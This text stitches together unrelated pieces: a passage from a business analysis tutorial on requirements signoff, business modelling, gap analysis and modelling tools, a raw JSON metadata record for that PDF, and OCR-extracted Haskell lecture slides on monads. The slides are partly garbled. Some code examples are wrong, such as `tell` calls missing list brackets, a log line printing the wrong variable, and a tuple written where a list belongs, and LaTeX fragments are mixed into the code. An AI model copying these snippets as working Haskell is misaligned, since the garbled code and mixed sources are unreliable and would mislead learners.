why?” From the business analysts, product managers and project leaders to the developers, QA managers and testers, along with the stakeholders and customers involved – so often the root cause of project failure is a misunderstanding of the scope of the project. When everyone is collaborating, and has full context and visibility to the discussions, decisions and changes involved with the requirements throughout the lifecycle of the project, that is when success happens consistently and you maintain continuous quality. In addition, the process is smoother with less friction and frustration along the way for everyone involved. Note: Research has shown that project teams can eliminate 50-80% of project defects by effectively managing requirements. According to the Carnegie Mellon software engineering institute, “60-80 percent of the cost of software development is in rework.” Obtaining Requirements Signoff Requirements signoff formalizes agreement by project stakeholders that the content and presentation of the requirements, as documented, are accurate and complete. Formal agreement reduces the risk that, during or subsequent to implementation, a stakeholder will introduce a new (previously unencountered) requirement. Obtaining requirements signoff typically involves a face-to-face final review of requirements, as documented, with each project stakeholder. At the end each review, the stakeholder is asked to formally approve the reviewed requirements document. This approval may be recorded either physically or electronically. Obtaining requirements signoff is typically the final task within Requirements Communication. The Business Analyst will require the output from the Formal Requirements Review(s), including accommodation of any comments or objections which were raised during the review process. A Business Model can be defined as a representation of a business or solution that often include a graphic component along with supporting text and relationships to other components. For example, if we have to understand a company’s business model, then we would like to study the following areas like - Core values of the company - What it serves? - What is sets apart? - Its key resources - Major relationships - Its delivery channels With the help of modelling techniques, we can create a complete description of existing and proposed organizational structures, processes, and information used by the enterprise. Business Model is a structured model, just like a blueprint for the final product to be developed. It gives structure and dynamics for planning. It also provides the foundation for the final product. **Purpose of Business Modelling** Business modelling is used to design current and future state of an enterprise. This model is used by the Business Analyst and the stakeholders to ensure that they have an accurate understanding of the current “As-Is” model of the enterprise. It is used to verify if, stakeholders have a shared understanding of the proposed “To-be of the solution. Analyzing requirements is a part of business modelling process and it forms the core focus area. Functional Requirements are gathered during the “Current state”. These requirements are provided by the stakeholders regarding the business processes, data, and business rules that describe the desired functionality which will be designed in the Future State. Performing GAP Analysis After defining the business needs, the current state (e.g. current business processes, business functions, features of a current system and services/products offered and events that the system must respond to) must be identified to understand how people, processes and technology, structure and architecture are supporting the business by seeking input from IT staff and other related stakeholders including business owners. A gap analysis is then performed to assess, if there is any gap that prevents from achieving business needs by comparing the identified current state with the desired outcomes. If there is no gap (i.e. the current state is adequate to meet the business needs and desired outcomes), it will probably not be necessary to launch the IT project. Otherwise, the problems/issues required to be addressed in order to bridge the gap should be identified. Techniques such as SWOT (Strengths, Weaknesses, Opportunities and Threats) Analysis and document analysis can be used. To Assess Proposed System BA should assist the IT project team in assessing the proposed IT system to ensure that it meets the business needs and maximizes the values delivered to stakeholders. BA should also review the organization readiness for supporting the transition to the proposed IT system to ensure a smooth System Implementation. Step 1: Assess Proposed System Step 2: Review Organization Readiness for System Implementation BA should help the IT project team to determine whether the proposed system option and the high-level system design could meet the business needs and deliver enough business value to justify the investment. If there are more than one system options, BA should work with the IT staff to help to identify the pros and cons of each option and select the option that delivers the greatest business value. Guiding Principles for Business Modelling The primary role of business modelling is mostly during inception stage and elaboration stages of project and it fades during the construction and transitioning stage. It is mostly to do with analytical aspects of business combined with technical mapping of the application or software solution. - **Domain and User variation**: Developing a business model will frequently reveal areas of disagreement or confusion between stakeholders. The Business Analyst will need to document the following variations in the as-is model. - **Multiple work units perform the same function**: Document the variances in the AS-IS model. This may be different divisions or geographies. - **Multiples users perform the same work**: Different stakeholders may do similar work differently. The variation may be the result of different skill sets and approaches of different business units or the result of differing needs of external stakeholders serviced by the enterprise. Document the variances in the AS-IS model. - **Resolution Mechanism**: The Business Analyst should document whether the To-Be solution will accommodate the inconsistencies in the current business model or whether the solution will require standardization. Stakeholders need to determine which approach to follow. The To-Be model will reflect their decision. Example of BA role in Modelling ERP Systems A Business analyst is supposed to define a standard business process and set up into an ERP system which is of key importance for efficient implementation. It is also the duty of a BA to define the language of the developers in understandable language before the implementation and then, utilize best practices and map them based on the system capabilities. A requirement to the system is the GAAP fit analysis, which has to balance between: - The need for the technical changes, which are the enhancements in order to achieve identity with the existing practice. - Effective changes, which are related to re-engineering of existing business processes to allow for implementation of the standard functionality and application of process models. **Functional Business Analyst** Domain expertise is generally acquired over a period by being in the “business” of doing things. For example, - A **banking associate** gains knowledge of various types of accounts that a customer (individual and business) can operate along with detailed business process flow. - An **insurance sales representative** can understand the various stages involved in procuring of an Insurance policy. - A **marketing analyst** has more chances of understanding the key stakeholders and business processes involved in a Customer Relationship Management system. - A Business Analyst involved in **capital markets** project is supposed to have subject matter expertise and strong knowledge of Equities, Fixed Income and Derivatives. Also, he is expected to have handled back office, front office, practical exposure in applying risk management models. - A **Healthcare Business Analyst** is required to have basic understanding of US Healthcare Financial and Utilization metrics, Technical experience and understanding of EDI 837/835/834, HIPAA guidelines, ICD codification – 9/10 and CPT codes, LOINC, SNOMED knowledge. Some business analysts acquire domain knowledge by testing business applications and working with the business users. They create a conducive learning environment though their interpersonal and analytical skills. In some cases, they supplement their domain knowledge with a few domain certifications offered by AICPCU/IIA and LOMA in the field of Insurance and financial services. There are other institutes that offer certification in other domains. **Other Major Activities** Following a thorough examination of current business processes, you can offer highly professional assistance in identifying the optimal approach of modelling the system. - Organizing the preparation of a formalized and uniform description of business processes in a manner ensuring efficient automation in the system. - Assistance to your teams in filling out standard questionnaires for the relevant system as may be furnished by the developers. - Participation in working meetings requirements towards the developers are defined. Check and control as to whether the requirements set by you have been properly "reproduced" and recorded in the documents describing the future model in the system (Blueprints). Preparation of data and assisting for prototyping the system. Assistance in preparation of data for migration of lists and balances in the format required by the system. Review of the set-up prototype for compliance with the requirements defined by the business process owners. Acting as a support resource to your IT teams in preparing data and actual performance of functional and integration tests in the system. In the next section, we will discuss briefly about some of the popular Business Modelling Tools used by large organizations in IT environments. **Tool 1: Microsoft Visio** MS-Visio is a drawing and diagramming software that helps transform concepts into a visual representation. Visio provides you with pre-defined shapes, symbols, backgrounds, and borders. Just drag and drop elements into your diagram to create a professional communication tool. **Step 1:** To open a new Visio drawing, go to the Start Menu and select Programs → Visio. **Step 2:** Move your cursor over “Business Process” and select “Basic Flowchart” The following screenshot shows the major sections of MS-Visio application. Let us now discuss the basic utility of each component: **A:** the toolbars across the top of the screen are like other Microsoft programs such as Word and PowerPoint. If you have used these programs before, you may notice a few different functionalities, which we will explore later. Selecting Help Diagram Gallery is a good way to become familiar with the types of drawings and diagrams that can be created in Visio. **B:** The left side of the screen shows the menus specific to the type of diagram you are creating. In this case, we see: - Arrow Shapes - Backgrounds - Basic Flowchart Shapes - Borders and Titles **C:** The center of the screen shows the diagram workspace, which includes the actual diagram page as well as some blank space adjacent to the page. **D:** The right side of the screen shows some help functions. Some people may choose to close this window to increase the area for diagram workspace, and re-open the help functions when necessary. Tool 2: Enterprise Architect Enterprise architect is a visual modeling and design tool based on UML. The platform supports the design and construction of software systems, modeling business processes and modeling industry based domains. It is used by business and organizations to not only model the architecture of their systems. But to process the implementation of these models across the full application development life cycle. **Sample screenshot from an Enterprise solution** The intent of Enterprise architect is to determine how an organization can most effectively achieve its current and future objectives. Enterprise architect has four points of view which are as follows: - **Business perspective**: The Business perspective defines the processes and standards by which the business operates on day to day basis. - **Application Perspective**: The application perspective defines the interactions among the processes and standards used by the organization. - **Information Perspective**: This defines and classifies the raw data like document files, databases, images, presentations and spreadsheets that organization requires in order to efficiency operate. - **Technology Prospective**: This defines the hardware, operating systems, programming and networking solutions used by organization. Tool 3: Rational Requisite Pro The process of eliciting, documenting organizing tracking and changing Requirements and communicating this information across the project teams to ensure that iterative and unanticipated changes are maintained throughout the project life cycle. Monitoring status and controlling changes to the requirement baseline. The Primary elements are Change control and Traceability. Requisite Pro is used for the above activities and project administration purposes, the tool is used for querying and searching, Viewing the discussion that were part of the requirement. In Requisite Pro, the user can work on the requirement document. The document is a MS-Word file created in Reaprox application and integrated with the project database. Requirements created outside Requisite pro can be imported or copied into the document. In Requisite Pro, we can also work with traceability, here it is a dependency relationship between two requirements. Traceability is a methodical approach to managing change by linking requirements that are related to each other. Requisite Pro makes it easy to track changes to a requirement throughout the development cycle, so it is not necessary to review all your documents individually to determine which elements need updating. You can view and manage suspect relationships using a Traceability Matrix or a Traceability Tree view. Requisite Pro projects enable us to create a project framework in which the project artifacts are organized and managed. In each project the following are included: - General project information - Packages - General document information - Document types - Requirement types - Requirement attributes - Attribute values - Cross-project traceability Requisite Pro allows multiple user to access the same project documents and database simultaneously hence the project security aspect is very crucial. Security prevents the system use, potential harm, or data loss from unauthorized user access to a project document. It is recommended that the security is enabled for all RequisitePro projects. Doing so ensures that all changes to the project are associated with the proper username of the Individual who made the change, thereby ensuring that you have a complete audit trail for all changes.
{"Source-Url": "https://www.tutorialspoint.com/business_analysis/business_analysis_tutorial.pdf", "len_cl100k_base": 15747, "olmocr-version": "0.1.53", "pdf-total-pages": 55, "total-fallback-pages": 0, "total-input-tokens": 110767, "total-output-tokens": 17891, "length": "2e13", "weborganizer": {"__label__adult": 0.0004992485046386719, "__label__art_design": 0.0015716552734375, "__label__crime_law": 0.0002448558807373047, "__label__education_jobs": 0.00870513916015625, "__label__entertainment": 0.0001709461212158203, "__label__fashion_beauty": 0.0002448558807373047, "__label__finance_business": 0.0030345916748046875, "__label__food_dining": 0.0004322528839111328, "__label__games": 0.001251220703125, "__label__hardware": 0.0005946159362792969, "__label__health": 0.0002899169921875, "__label__history": 0.00034308433532714844, "__label__home_hobbies": 0.00023162364959716797, "__label__industrial": 0.0004558563232421875, "__label__literature": 0.0004875659942626953, "__label__politics": 0.00022518634796142575, "__label__religion": 0.0004417896270751953, "__label__science_tech": 0.00458526611328125, "__label__social_life": 0.00019025802612304688, "__label__software": 0.0151214599609375, "__label__software_dev": 0.9599609375, "__label__sports_fitness": 0.0003867149353027344, "__label__transportation": 0.0004181861877441406, "__label__travel": 0.00030303001403808594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 85688, 0.0023]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 85688, 0.24727]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 85688, 0.91512]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 1806, false], [1806, 3976, null], [3976, 6696, null], [6696, 8099, null], [8099, 10178, null], [10178, 10887, null], [10887, 11528, null], [11528, 12496, null], [12496, 14393, null], [14393, 15679, null], [15679, 16144, null], [16144, 18300, null], [18300, 20513, null], [20513, 22569, null], [22569, 22971, null], [22971, 25204, null], [25204, 26965, null], [26965, 28871, null], [28871, 30273, null], [30273, 32573, null], [32573, 34525, null], [34525, 36817, null], [36817, 39071, null], [39071, 40724, null], [40724, 41250, null], [41250, 43575, null], [43575, 45518, null], [45518, 47703, null], [47703, 48936, null], [48936, 50236, null], [50236, 50833, null], [50833, 51894, null], [51894, 53252, null], [53252, 53669, null], [53669, 54903, null], [54903, 56915, null], [56915, 58548, null], [58548, 60466, null], [60466, 61613, null], [61613, 63471, null], [63471, 65589, null], [65589, 67310, null], [67310, 68371, null], [68371, 71133, null], [71133, 72076, null], [72076, 73639, null], [73639, 74658, null], [74658, 77264, null], [77264, 79816, null], [79816, 81041, null], [81041, 82088, null], [82088, 83403, null], [83403, 84487, null], [84487, 85688, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 1806, true], [1806, 3976, null], [3976, 6696, null], [6696, 8099, null], [8099, 10178, null], [10178, 10887, null], [10887, 11528, null], [11528, 12496, null], [12496, 14393, null], [14393, 15679, null], [15679, 16144, null], [16144, 18300, null], [18300, 20513, null], [20513, 22569, null], [22569, 22971, null], [22971, 25204, null], [25204, 26965, null], [26965, 28871, null], [28871, 30273, null], [30273, 32573, null], [32573, 34525, null], [34525, 36817, null], [36817, 39071, null], [39071, 40724, null], [40724, 41250, null], [41250, 43575, null], [43575, 45518, null], [45518, 47703, null], [47703, 48936, null], [48936, 50236, null], [50236, 50833, null], [50833, 51894, null], [51894, 53252, null], [53252, 53669, null], [53669, 54903, null], [54903, 56915, null], [56915, 58548, null], [58548, 60466, null], [60466, 61613, null], [61613, 63471, null], [63471, 65589, null], [65589, 67310, null], [67310, 68371, null], [68371, 71133, null], [71133, 72076, null], [72076, 73639, null], [73639, 74658, null], [74658, 77264, null], [77264, 79816, null], [79816, 81041, null], [81041, 82088, null], [82088, 83403, null], [83403, 84487, null], [84487, 85688, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 85688, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 85688, null]], "pdf_page_numbers": [[0, 0, 1], [0, 1806, 2], [1806, 3976, 3], [3976, 6696, 4], [6696, 8099, 5], [8099, 10178, 6], [10178, 10887, 7], [10887, 11528, 8], [11528, 12496, 9], [12496, 14393, 10], [14393, 15679, 11], [15679, 16144, 12], [16144, 18300, 13], [18300, 20513, 14], [20513, 22569, 15], [22569, 22971, 16], [22971, 25204, 17], [25204, 26965, 18], [26965, 28871, 19], [28871, 30273, 20], [30273, 32573, 21], [32573, 34525, 22], [34525, 36817, 23], [36817, 39071, 24], [39071, 40724, 25], [40724, 41250, 26], [41250, 43575, 27], [43575, 45518, 28], [45518, 47703, 29], [47703, 48936, 30], [48936, 50236, 31], [50236, 50833, 32], [50833, 51894, 33], [51894, 53252, 34], [53252, 53669, 35], [53669, 54903, 36], [54903, 56915, 37], [56915, 58548, 38], [58548, 60466, 39], [60466, 61613, 40], [61613, 63471, 41], [63471, 65589, 42], [65589, 67310, 43], [67310, 68371, 44], [68371, 71133, 45], [71133, 72076, 46], [72076, 73639, 47], [73639, 74658, 48], [74658, 77264, 49], [77264, 79816, 50], [79816, 81041, 51], [81041, 82088, 52], [82088, 83403, 53], [83403, 84487, 54], [84487, 85688, 55]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 85688, 0.05117]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
68e012debd9ea2f2a33240de27091955c960c07f
Monads Stephen A. Edwards Columbia University Fall 2020 Motivating Example: lookup3 The Monad Type Class The Maybe Monad do Blocks The Either Monad Monad Laws The List Monad List Comprehensions as a Monad The MonadPlus Type Class and guard The Writer Monad Some Monadic Functions: liftM, ap, join, filterM, foldM, mapM, sequence Functions as Monads The State Monad An Interpreter for a Simple Imperative Language Motivating Example: Chasing References in a Dictionary In Data.Map, \[ \text{lookup} :: \text{Ord } k \Rightarrow k \rightarrow \text{Map } k \ a \rightarrow \text{Maybe } a \] Say we want a function that uses a key to look up a value, then treat that value as another key to look up a third key, which we look up and return, e.g., \[ \text{lookup3} :: \text{Ord } k \Rightarrow k \rightarrow \text{Map.Map } k\ k \rightarrow \text{Maybe } k \] Prelude\> import qualified Data.Map.Strict as Map Prelude Map\> myMap = Map.fromList [("One","Two"),("Two","Three"), ("Three","Winner")] Prelude Map\> Map.lookup "One" myMap Just "Two" Prelude Map\> Map.lookup "Two" myMap Just "Three" Prelude Map\> Map.lookup "Three" myMap Just "Winner" A First Attempt lookup3 :: Ord k => k -> Map.Map k k -> Maybe k -- First try lookup3 k1 m = case Map.lookup k1 m of Nothing -> Nothing Just k2 -> case Map.lookup k2 m of Nothing -> Nothing Just k3 -> Map.lookup k3 m Too much repeated code, but it works. *Main Map> lookup3 "Three" myMap Nothing *Main Map> lookup3 "Two" myMap Nothing *Main Map> lookup3 "One" myMap Just "Winner" What’s the Repeated Pattern Here? Nothing -> Nothing Just k2 -> case Map.lookup k2 m of ... “Pattern match on a Maybe. Nothing returns Nothing, otherwise, strip out the payload from the Just and use it as an argument to a lookup lookup.” lookup3 :: Ord k => k -> Map.Map k k -> Maybe k -- Second try lookup3 k1 m = (helper . helper . helper) (Just k1) where helper Nothing = Nothing helper (Just k) = Map.lookup k m This looks a job for a Functor or Applicative Functor... class Functor f where fmap :: (a -> b) -> f a -> f b -- Apply function to data in context class Functor f => Applicative f where (<*>): f (a -> b) -> f a -> f b -- Apply a function in a context ..but these don’t fit because our steps take a key and return a key in context. Even Better: An “ifJust” Function ```haskell ifJust :: Maybe k -> (k -> Maybe k) -> Maybe k ifJust Nothing _ = Nothing -- Failure: nothing more to do ifJust (Just k) f = f k -- Success: pass k to the function lookup3 :: Ord k => k -> Map.Map k k -> Maybe k lookup3 k1 m = ifJust (Map.lookup k1 m) ( k2 -> ifJust (Map.lookup k2 m) ( k3 -> Map.lookup k3 m)) ``` It's cleaner to write `ifJust` as an infix operator: ```haskell lookup3 :: Ord k => k -> Map.Map k k -> Maybe k lookup3 k1 m = Map.lookup k1 m `ifJust` \k2 -> Map.lookup k2 m `ifJust` \k3 -> Map.lookup k3 m ``` The Monad Type Class: It’s All About That Bind \[ \text{infixl 1 } \gg= \\ \text{class } \text{Applicative } m \Rightarrow \text{Monad } m \text{ where} \\ (\gg=) :: m \ a \rightarrow (a \rightarrow m \ b) \rightarrow m \ b \quad \text{-- “Bind”} \\ \text{return} :: a \rightarrow m \ a \quad \text{-- Wrap a result in the Monad} \] Bind, \(\gg=\), is the operator missing from the Functor and Applicative Functor type classes. It allows chaining context-producing functions \[ \text{pure} :: b \rightarrow f \ b \quad \text{-- Put value in context} \\ \text{fmap} :: (a \rightarrow b) \rightarrow f \ a \rightarrow f \ b \quad \text{-- Apply function in context} \\ (\langle\ast\rangle) :: f (a \rightarrow b) \rightarrow f \ a \rightarrow f \ b \quad \text{-- Function itself is in context} \\ "\gg=" :: (a \rightarrow f \ b) \rightarrow f \ a \rightarrow f \ b \quad \text{-- Apply a context-producing func.} \] Actually, Monad is a little bigger ```haskell infixl 1 >> >>= class Monad m where -- The bind operator: apply the result in a Monad to a Monad producer (>>=) :: m a -> (a -> m b) -> m b -- Encapsulate a value in the Monad return :: a -> m a -- Like >>= but discard the result; often m () -> m b -> m b (>>) :: m a -> m b -> m b x >> y = x >>= \_ -> y -- The default, which usually suffices -- Internal: added by the compiler to handle failed pattern matches fail :: String -> m a fail msg = error msg ``` Maybe is a Monad class Monad m where return :: a -> m a (>>=) :: m a -> (a -> m b) -> m b fail :: String -> m a instance Monad Maybe where -- Standard Prelude definition return x = Just x -- Wrap in a Just Just x >>= f = f x -- Our “ifjust” function Nothing >>= _ = Nothing -- “computation failed” fail _ = Nothing -- fail quietly The Maybe Monad in Action Prelude> :t return "what?" return "what?" :: Monad m => m [Char] Prelude> return "what?" :: Maybe String Just "what?" Prelude> Just 9 >>= \x -> return (x*10) Just 90 Prelude> Just 9 >>= \x -> return (x*10) >>= \y -> return (y+5) Just 95 Prelude> Just 9 >>= \x -> Nothing >>= \y -> return (x+5) Nothing Prelude> Just 9 >> return 8 >>= \y -> return (y*10) Just 80 Prelude> Just 9 >>= \_ -> fail "darn" >>= \x -> return (x*10) Nothing lookup3 using Monads ``` instance Monad Maybe where return x = Just x Just x >>= f = f x -- Apply f to last (successful) result Nothing >>= _ = Nothing -- Give up ``` ``` lookup3 :: Ord k => k -> Map.Map k k -> Maybe k lookup3 k1 m = Map.lookup k1 m >>= \k2 -> Map.lookup k2 m >>= \k3 -> Map.lookup k3 m ``` Or, equivalently, ``` lookup3 :: Ord k => k -> Map.Map k k -> Maybe k lookup3 k1 m = Map.lookup k1 m >>= \k2 -> Map.lookup k2 m >>= \k3 -> Map.lookup k3 m ``` Monads and the do Keyword: Not Just For I/O Monads are so useful, Haskell provides do notation to code them succinctly: ```haskell lookup3 :: Ord k => k -> Map.Map k k -> Maybe k lookup3 k1 m = do k2 <- Map.lookup k1 m k3 <- Map.lookup k2 m Map.lookup k3 m ``` These are semantically identical. do inserts the >>=‘s and lambdas. Note: each lambda’s argument moves to the left of the expression ```haskell k2 <- Map.lookup k1 m ``` ```haskell Map.lookup k1 m >>= \k2 -> ``` Like an Applicative Functor ``` Prelude> (+) <$> Just 5 <*> Just 3 Just 8 Prelude> do Prelude| x <- Just (5 :: Int) Prelude| y <- return 3 Prelude| return (x + y) Just 8 Prelude> :t it it :: Maybe Int ``` The Monad's type may change; "Nothing" halts and forces Maybe ``` Prelude> do Prelude| x <- return 5 Prelude| y <- return "ha!" Prelude| Nothing Prelude| return x Nothing ``` fail is called when a pattern match fails ``` Prelude> do Prelude| (x:xs) <- Just "Hello" Prelude| return x Just 'H' Prelude> do Prelude| (x:xs) <- Just [] Prelude| return x Nothing ``` Like Maybe, Either is a Monad ``` data Either a b = Left a | Right b -- Data.Either instance Monad (Either e) where return x = Right x Right x >>= f = f x -- Right: keep the computation going Left err >>= _ = Left err -- Left: something went wrong Prelude> do Prelude| x <- Right "Hello" Prelude| y <- return "World" Prelude| return $ x ++ y Right "Hello World" Prelude> do Prelude| Right "Hello" Prelude| x <- Left "failed" Prelude| y <- Right $ x ++ "darn" Prelude| return y Left "failed" ``` Monad Laws Left identity: applying a wrapped argument with >>= just applies the function \[ \text{return } x >>= f = f x \] Right identity: using >>= to unwrap then return to wrap does nothing \[ m >>= \text{return } = m \] Associative: applying \( g \) after applying \( f \) is like applying \( f \) composed with \( g \) \[ (m >>= f) >>= g = m >>= (\lambda x \to f x >>= g) \] The List Monad: “Nondeterministic Computation” Intuition: lists represent all possible results ```haskell instance Monad [] where return x = [x] -- Exactly one result xs >>= f = concat (map f xs) -- Collect all possible results from f fail _ = [] -- Error: “no possible result” ``` Prelude> [10,20,30] >>= \x -> [x-3, x, x+3] [7,10,13,17,20,23,27,30,33] “If we start with 10, 20, or 30, then either subtract 3, do nothing, or add 3, we will get 7 or 10 or 13 or 17 or ..., or 33” ``` [10,20,30] >>= \x -> [x-3, x, x+3] = concat (map (\x -> [x-3, x, x+3]) [10,20,30]) = concat [[7,10,13],[17,20,23],[27,30,33]] = [7,10,13,17,20,23,27,30,33] ``` The List Monad Everything needs to produce a list, but the lists may be of different types: ``` Prelude> [1,2] >>= \x -> ['a','b'] >>= \c -> [(x,c)] [(1,'a'),(1,'b'),(2,'a'),(2,'b')] ``` This works because -> is at a lower level of precedence than >>= ``` [1,2] >>= \x -> ['a','b'] >>= \c -> [(x,c)] = [1,2] >>= (\x -> ([ 'a','b' ] >>= (\c -> [(x,c)])) = [1,2] >>= (\x -> (concat (map (\c -> [(x,c)])) ['a','b'])) = [1,2] >>= (\x -> [(x,'a'),(x,'b')]) = concat (map (\x -> [(x,'a'),(x,'b')]) [1,2]) = concat [[(1,'a'),(1,'b')],[(2,'a'),(2,'b')]] = [(1,'a'),(1,'b'),(2,'a'),(2,'b')] ``` The List Monad, do Notation, and List Comprehensions \[(1,2) \gg= \lambda x \rightarrow [\text{'a'}, \text{'b'}] \gg= \lambda c \rightarrow \text{return} \ (x, c)\] \[(1,2) \gg= \lambda x \rightarrow [\text{'a'}, \text{'b'}] \gg= \lambda c \rightarrow \text{return} \ (x, c)\] do \ x \leftarrow [1,2] \quad -- \text{Send 1 and 2 to the function that takes } x \text{ and} \quad c \leftarrow [\text{'a'}, \text{'b'}] \quad -- \text{sends 'a' and 'b' to the function that takes } c \text{ and} \quad \text{return} \ (x, c) \quad -- \text{wraps the pair } (x, c)\] \[\{(x,c) | x \leftarrow [1,2], c \leftarrow [\text{'a'}, \text{'b'}]\}\] each produce \[ \begin{bmatrix} (1, \text{'a'}), (1, \text{'b'}), (2, \text{'a'}), (2, \text{'b'}) \end{bmatrix} \] class Monad m => MonadPlus m where -- In Control.Monad mzero :: m a -- “Fail,” like Monoid’s mempty mplus :: m a -> m a -> m a -- “Alternative,” like Monoid’s mappend instance MonadPlus [] where mzero = [] mplus = (++) guard :: MonadPlus m => Bool -> m () guard True = return () -- In whatever Monad you’re using guard False = mzero -- “Empty” value in the Monad Using Control.Monad.guard as a filter guard uses \texttt{mzero} to terminate a MonadPlus computation (e.g., Maybe, [], IO) It either succeeds and returns () or fails. We never care about (), so use >> \[ \begin{align*} [1..50] & \triangleright= \backslash x \rightarrow \\ & \text{guard } (x \ `\text{rem}` 7 == 0) \triangleright \quad \text{-- Discard any returned ()} \\ & \text{return } x \end{align*} \] \[ \begin{align*} \text{do } x & \leftarrow [1..50] \\ & \text{guard } (x \ `\text{rem}` 7 == 0) \quad \text{-- No } \leftarrow \text{ makes for an implicit } \triangleright \\ & \text{return } x \end{align*} \] \[ [ x | x \leftarrow [1..50], x `\text{rem}` 7 == 0 ] \] each produce \[ [7,14,21,28,35,42,49] \] The Control.Monad.Writer Monad For computations that return a value and accumulate a result in a Monoid, e.g., logging or code generation. Just a wrapper around a (value, log) pair. In Control.Monad.Writer, ```haskell newtype Writer w a = Writer { runWriter :: (a, w) } instance Monoid w => Monad (Writer w) where return x = Writer (x, mempty) -- Append nothing Writer (x, l) >>= f = let Writer (y, l') = f x in Writer (y, l `mappend` l') -- Append to log ``` *a* is the result value *w* is the accumulating log Monoid (e.g., a list) `runWriter` extracts the (value, log) pair from a `Writer` computation The Writer Monad in Action ```haskell import Control.Monad.Writer logEx :: Int -> Writer [String] Int -- Type of log, result logEx a = do tell "logEx " ++ show a -- Just log b <- return 42 -- No log tell "b = " ++ show a c <- writer (a + b + 10, ["compute c"]) -- Value and log tell "c = " ++ show c return c *Main> runWriter (logEx 100) (152,["logEx 100","b = 100","compute c","c = 152"]) ``` Verbose GCD with the Writer ```haskell *Main> mapM_ putStrLn $ snd $ runWriter $ logGCD 9 3 logGCD 9 3 a > b logGCD 6 9 a < b logGCD 6 3 a > b logGCD 3 6 a < b logGCD 3 3 finished ``` ```haskell import Control.Monad.Writer logGCD :: Int -> Int -> Writer [String] Int logGCD a b = do tell ["logGCD " ++ show a ++ " " ++ show b] if a == b then do writer (a, ["finished"]) else if a < b then do tell ["a < b"] logGCD a (b - a) else do tell ["a > b"] logGCD (a - b) a ``` Control.Monad.{liftM, ap}: Monads as Functors \[ \text{fmap} \, f \quad \Rightarrow \quad (a \rightarrow b) \rightarrow f \ a \rightarrow f \ b \quad \text{-- a.k.a.} \quad <\$> \] \[ (\langle\ast\rangle) \, : \, \text{Applicative} \; f \; \Rightarrow \; f \; (a \rightarrow b) \rightarrow f \; a \rightarrow f \; b \quad \text{-- “apply”} \] In Monad-land, these have alternative names \[ \text{liftM} \, : \, \text{Monad} \; m \; \Rightarrow \; (a \rightarrow b) \rightarrow m \; a \rightarrow m \; b \] \[ \text{ap} \, : \, \text{Monad} \; m \; \Rightarrow \; m \; (a \rightarrow b) \rightarrow m \; a \rightarrow m \; b \] and can be implemented with \( \gg= \) (or, equivalently, do notation) \[ \text{liftM} \; f \; m \; = \; \text{do} \; x \leftarrow m \quad \text{-- Get the argument from inside } m \] \[ \quad \text{return} \; (f \; x) \quad \text{-- Apply the argument to the function} \] \[ \text{ap} \; mf \; m \; = \; \text{do} \; f \leftarrow mf \quad \text{-- Get the function from inside } mf \] \[ \quad x \leftarrow m \quad \text{-- Get the argument from inside } m \] \[ \quad \text{return} \; (f \; x) \quad \text{-- Apply the argument to the function} \] Operations in a \textit{do} block are ordered: \( \text{ap} \) evaluates its arguments left-to-right liftM and ap In Action ```haskell liftM :: Monad m => (a -> b) -> m a -> m b ap :: Monad m => m (a -> b) -> m a -> m b ``` ``` Prelude> import Control.Monad Prelude Control.Monad> liftM (map Data.Char.toUpper) getline "HELLO" ``` Evaluate (+10) 42, but keep a log: ```haskell Prelude> :set prompt "> " > :set prompt-cont "| " > import Control.Monad.Writer > :{ | runWriter $ | ap (writer ((+10), ["first"])) (writer (42, ["second"])) | :} (52,["first","second"]) ``` Lots of Lifting: Applying two- and three-argument functions In Control.Applicative, applying a normal function to Applicative arguments: \[ \text{liftA2 :: Applicative } \Rightarrow (a \rightarrow b \rightarrow c) \rightarrow f \ a \rightarrow f \ b \rightarrow f \ c \] \[ \text{liftA3 :: Applicative } \Rightarrow (a \rightarrow b \rightarrow c \rightarrow d) \rightarrow f \ a \rightarrow f \ b \rightarrow f \ c \rightarrow f \ d \] In Control.Monad, \[ \text{liftM2 :: Monad } \Rightarrow (a \rightarrow b \rightarrow c) \rightarrow m \ a \rightarrow m \ b \rightarrow m \ c \] \[ \text{liftM3 :: Monad } \Rightarrow (a \rightarrow b \rightarrow c \rightarrow d) \rightarrow m \ a \rightarrow m \ b \rightarrow m \ c \rightarrow m \ d \] Example: lift the pairing operator \((,\)\) to the Maybe Monad: Prelude Control.Monad> \text{liftM2 (,) (Just 'a') (Just 'b')} Just ('a','b') Prelude Control.Monad> \text{liftM2 (,) Nothing (Just 'b')} Nothing join: Unwrapping a Wrapped Monad/Combining Objects \[ \text{join} :: \text{Monad} \ m \Rightarrow m (m \ a) \rightarrow m \ a \quad \text{--- in Control.Monad} \] \[ \text{join } mm = \text{do } m <- mm \quad \text{--- Remove the outer Monad; get the inner one} \quad m \quad \text{--- Pass it back verbatim (i.e., without wrapping it)} \] \textit{join} is boring on a Monad like Maybe, where it merely strips off a “Just” \begin{verbatim} Prelude Control.Monad> join (Just (Just 3)) Just 3 \end{verbatim} For Monads that hold multiple objects, \textit{join} lives up to its name and performs some sort of concatenation \begin{verbatim} > join ["Hello", "Monadic", "World!"] "Hello Monadic World!" \end{verbatim} \[ \text{join } (\text{liftM } f \ m) \text{ is the same as } m 